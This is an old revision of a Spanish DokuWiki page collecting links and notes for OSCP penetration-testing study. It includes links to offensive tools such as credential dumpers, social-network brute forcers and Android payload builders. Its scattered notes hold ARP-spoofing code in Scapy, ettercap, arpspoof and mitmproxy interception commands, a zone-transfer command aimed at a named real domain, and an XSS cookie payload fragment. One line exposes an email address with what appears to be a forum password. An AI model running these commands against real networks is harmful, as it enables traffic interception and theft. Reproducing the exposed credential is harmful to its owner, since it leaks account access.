Herramientas de usuario

Herramientas del sitio


seguridad:enlaces:certificaciones:oscp

¡Esta es una revisión vieja del documento!


Profesional certificado en seguridad ofensiva (OSCP)

Profesional certificado en seguridad ofensiva (OSCP) es una certificación de ethical hacking ofrecida por Offensive Security que enseña metodologías de exámenes de penetración y utilizan herramientas incluyendo el examen de pentración BackTrack (ahora realizado con éxito con la distribución Kali Linux)1​2​ La certificación OSCP consiste en un examen práctico que requiere atacar y penetrar de manera satisfactoria varias maquinas en un ambiente seguro controlado.3​ Actualmente, es una de las pocas certificaciones que requiere evidencia de las habilidades en la parte práctica que consiste en una prueba de penetración.

Referencias para prepararse

  • shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation

beef project

sitio de boca buscar alert(document.cookie)</script>

https://www.netcraft.com/

https://www.seleniumhq.org/

https://panopticlick.eff.org/

https://beefproject.com/

dig @200.111.157.67 unap.cl -t AXFR

https://www.acunetix.com/

https://github.com/1N3/Sn1per

portnocking

https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/

https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://kali.training/lessons/introduction/

https://kali.training/topic/introduction-to-kali-linux/

https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/ https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/

https://smarterworkspaces.kyocera.es/blog/certificacion-seguridad-informatica-cuales-las-principales/

(ip.addr == 10.168.40.145) and (!udp contains “HTTP/1.1”)

https://tools.kali.org/information-gathering/nmap

ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1

https://3.14.by/en/md5

https://github.com/alearea51/IKn0wU

https://github.com/TunisianEagles/SocialBox

https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne

https://github.com/reconSF/python/blob/master/Syngress.Violent.Python.a.Cookbook.for.Hackers.2013.pdf

https://github.com/vk496/linset

https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/manual-basico-de-wifislax-y-sus-herramientas-de-auditoria/

https://github.com/WifiPhisher

https://github.com/xtr4nge/FruityWifi

scapy

a = ARP(op=“who-has”, psrc=“192.168.168.2”, pdst=“192.168.168.131”, hwdst=“fe80::4067:2e3f:d06:61bd”)
send(a, inter=3, loop=1)

a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“fe80::4067:2e3f:d06:61bd”)

10.168.40.1

ip a falsear ip victima mac victima a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“08:00:27:52:2D:A0”)

send(a, inter=3, loop=1)

ettercap

ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145/// 

tcpdump -n -i wlan0 -e 'arp or icmp'

arping -c 1 -I wlan0 10.168.40.1 ARPING 10.168.40.1 60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec 60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec

— 10.168.40.1 statistics —

https://sandilands.info/sgordon/arp-spoofing-on-wired-lan

mitmproxy

arpspoof -i eth0 -t 10.168.40.70 10.168.40.1

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8080

mitmproxy –mode transparent


bettercap -T ipvictima –proxy -P

https://github.com/byt3bl33d3r/MITMf https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html

https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/

w2af http://exploitpack.com/


WIFI

https://github.com/xtr4nge/FruityC2


android https://github.com/M4sc3r4n0/Evil-Droid

extra

https://github.com/nixawk/pentest-wiki

https://geekflare.com/online-scan-website-security-vulnerabilities/

otra

https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion

https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng https://www.aircrack-ng.org/doku.php?id=es:deauthentication

https://www.offensive-security.com/metasploit-unleashed/

https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp

OSCP

https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97

https://support.offensive-security.com/#!pwk-support.md https://support.offensive-security.com/#!oscp-exam-guide.md

https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf https://www.securitysift.com/offsec-pwb-oscp/ https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/

https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html

https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/ https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/

https://www.exam-labs.com/exam/NSE4#tutorial

https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/

https://wiki.wireshark.org/SampleCaptures

https://www.ubuntupit.com/an-ultimate-list-of-ethical-hacking-and-penetration-testing-tools-for-kali-linux/?fbclid=IwAR2szRvngTnDw8X7sETTlDH7letMnJriTBNSWYe_P4t49VVScqdxS2gWhV8

https://openwall.info/wiki/

https://github.com/ibr2/pwk-cheatsheet

https://www.keiththome.com/oscp-course-review/

http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/

https://amonsec.net/course/offensive-security-pwk-course-review

https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/

https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/

http://www.vividmachines.com/shellcode/shellcode.html

https://www.securitysift.com/offsec-ctp-osce/

https://hackforums.net/member.php cayuqueo@gmail.com EBM1JUD1yq57pmgUAiqHQ

http://nixware.net/my-osce-journey

http://www.cs.virginia.edu/~evans/cs216/guides/x86.html

https://www.pentesteracademy.com/topics

https://openwall.info/wiki/p_lkrg/Main

https://github.com/tanc7/hacking-books

https://github.com/tanc7

https://infosecuritygeek.com/vulnhub-kioptrix-2014/

http://www.securitysift.com/offsec-pwb-oscp/

https://xapax.gitbooks.io/security/content/

https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1

https://github.com/xapax/oscp

https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19

Cupp para crear diccionarios git clone https://github.com/Mebus/cupp.git

Generar ataques de Bruteforce a redes sociales git clone https://github.com/TunisianEagles/SocialBox.git

Dump de passwords (Volcado de memoria) https://github.com/AlessandroZ/LaZagne

Cracking WPA/WPA2 con phishing https://github.com/vk496/linset https://github.com/wifiphisher/wifiphisher

instabridge

–mode transparent

mitm.it/cert/p12

bettercap -T [ip_victima] –proxy -P

Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git

https://www.giuspen.com/cherrytree/

https://github.com/mikaelkall/HackingAllTheThings

https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/

https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1

https://github.com/so87/OSCP-PwK

https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0

https://github.com/OlivierLaflamme/Cheatsheet-God

https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1

https://www.giuspen.com/cherrytree/

http://www.fuzzysecurity.com/tutorials/16.html

Good reviews of CTP/OSCE (in no particular order):

Note: * mark means look for other posts on this blog

Tutorial sites (more stars = better/recommended):

Cheatsheets:

Good practice sites:

Vulnerable machines: vulnhub VMs: SickOS 1.1 SickOS 1.2 Droopy v0.2 Kevgir Pegasus SecTalks: BNE0x00 - Minotaur SecTalks: BNE0x03 - Simple NullByte: 1 FristiLeaks 1.3 OWASP Vulnerable Web Applications Directory Project Mutillidae Damn Vulnerable Web Application

LFI/RFI https://penetrate.io/2014/01/10/from-rfi-to-shell/

Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory

eBooks downloads: http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/ https://github.com/JpGallegos/CySecBooks https://www.securepla.net/the-hacker-playbook-2/ “Hacking: The Art of Exploitation”

https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo - Fuzzing (Scapy, TAO, Sulley) - Linux Exploitation (vanila stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, Return Oriented Programming into disabling DEP) - Web Application Hacker's Handbook (might be too large: Consider “webgoat”)

Various sites: http://www.sweetscape.com/ (010 Editor) https://github.com/campagnola/pycca https://github.com/Gallopsled/pwntools https://github.com/reyammer/shellnoob https://zeltser.com/convert-shellcode-to-assembly/ http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps https://github.com/peterferrie/win-exec-calc-shellcode http://www.secniu.com/why-my-shellcode-cannot-work/ http://thestarman.pcministry.com/asm/2bytejumps.htm http://blog.noobroot.com/ https://www.exploit-db.com/exploits/5342/ http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/ https://github.com/salcho/codetz http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html http://www.fuzzing.org/ http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/ https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ https://0x41.no/hacking-networks-with-snmp/ http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/ http://codemachine.com/downloads.html

Fun random stuff: http://patriciopalladino.com/files/hieroglyphy/ http://n01g3l.tumblr.com/ https://twitter.com/ch3rn0byl/status/832681279900487680

https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/

https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/

https://github.com/vanhoefm/modwifi https://github.com/vanhoefm/blackhat17-pocs

https://github.com/0x90/uberscapy

https://github.com/0x90/wifi-arsenal https://github.com/0x90/kali-scripts

https://nets.ec/Main_Page https://old.exploit-db.com/exploits/13284/

https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html

https://underc0de.org/foro/hacking/que-es-una-shellcode/

https://0x00sec.org/t/linux-shellcoding-part-1-0/289

https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html

https://github.com/Grazfather/PracticalMalwareLabs https://github.com/Grazfather/BlackHatPython

https://github.com/VulnHub/ctf-writeups

https://nullku7.github.io/stuff/vulnhub/walkthrough/2017/05/28/vulnhub-mr-robot.html

https://github.com/trustedsec

https://exploit.courses/#/challenges

https://payatu.com/guide-linux-privilege-escalation/

https://github.com/dobin/yookiterm-slides

https://exploit.courses/files/bfh2018/content.html

https://exploit.courses/files/bfh2017/content.html

https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html#pre-made-vms-tools

https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/

https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/

https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html

https://www.exploit-db.com/exploits/44298

https://github.com/jivoi/pentest

https://github.com/lucyoa/kernel-exploits

https://n0where.net/

https://github.com/Manisso/fsociety
Fsociety Hacking Tools Pack. A Penetration Testing Framework, you will have every script that a hacker needs

Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+. https://github.com/nbulischeck/tyton https://nbulischeck.github.io/tyton/

https://github.com/fireeye/flare-vm - FLARE VM - a fully customizable, Windows-based security distribution for malware analysis, incident response, penetration testing, etc.

https://n0where.net/

https://github.com/frizb/Vanquish
Vanquish is a Kali Linux based Enumeration Orchestrator built in Python. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases. The results of each phase are fed into the next phase to identify vulnerabilities that could be leveraged for a remote shell.

https://www.youtube.com/watch?v=YoNrNBnmwuY&feature=youtu.be

https://github.com/coreb1t/awesome-pentest-cheat-sheets

https://www.oracle.com/technetwork/community/developer-vm/index.html

https://github.com/buglessdr?tab=repositories

https://github.com/buglessdr/oscp-1

https://github.com/buglessdr/myarsenal

https://github.com/buglessdr/linux-exploit-suggester

https://github.com/buglessdr/OSCP-2

https://github.com/pentestmonkey

https://www.peerlyst.com/posts/ctf-virtual-machines-created-by-the-peerlyst-community-hack-these-peerlyst

https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki

https://github.com/ston3o/docker-hacklab

https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4

http://overthewire.org/wargames/

https://github.com/SecWiki/linux-kernel-exploits

https://www.pcihispano.com/cumplir-con-pci-dss-solamente-con-software-open-source-es-posible-aqui-te-explicamos-como-hacerlo/

https://opnsense.org/download/

https://www.peerlyst.com/posts/the-red-team-guide-chapter-11-privilege-escalation-haythem-arfaoui?utm_source=peerlyst_perspective&utm_medium=email&utm_content=peerlyst_post&utm_campaign=top_posts_on_peerlyst_this_week_01292019

https://github.com/thelinuxchoice?tab=repositories

https://pastebin.com/aqGvjhgB

https://github.com/osirislab/Hack-Night/

http://www.opensecuritytraining.info/Exploits1.html

http://www.opensecuritytraining.info/Exploits2.html

https://www.bebee.com/producer/@fran-brizzolis/ciberseguridad-en-pymes-administrando-sistemas-de-forma-segura-buenas-practicas

https://picoctf.com/resources

https://blog.osiris.cyber.nyu.edu/

https://www.hacker101.com/videos

seguridad/enlaces/certificaciones/oscp.1550584026.txt.gz · Última modificación: 2019/02/19 13:47 por cayu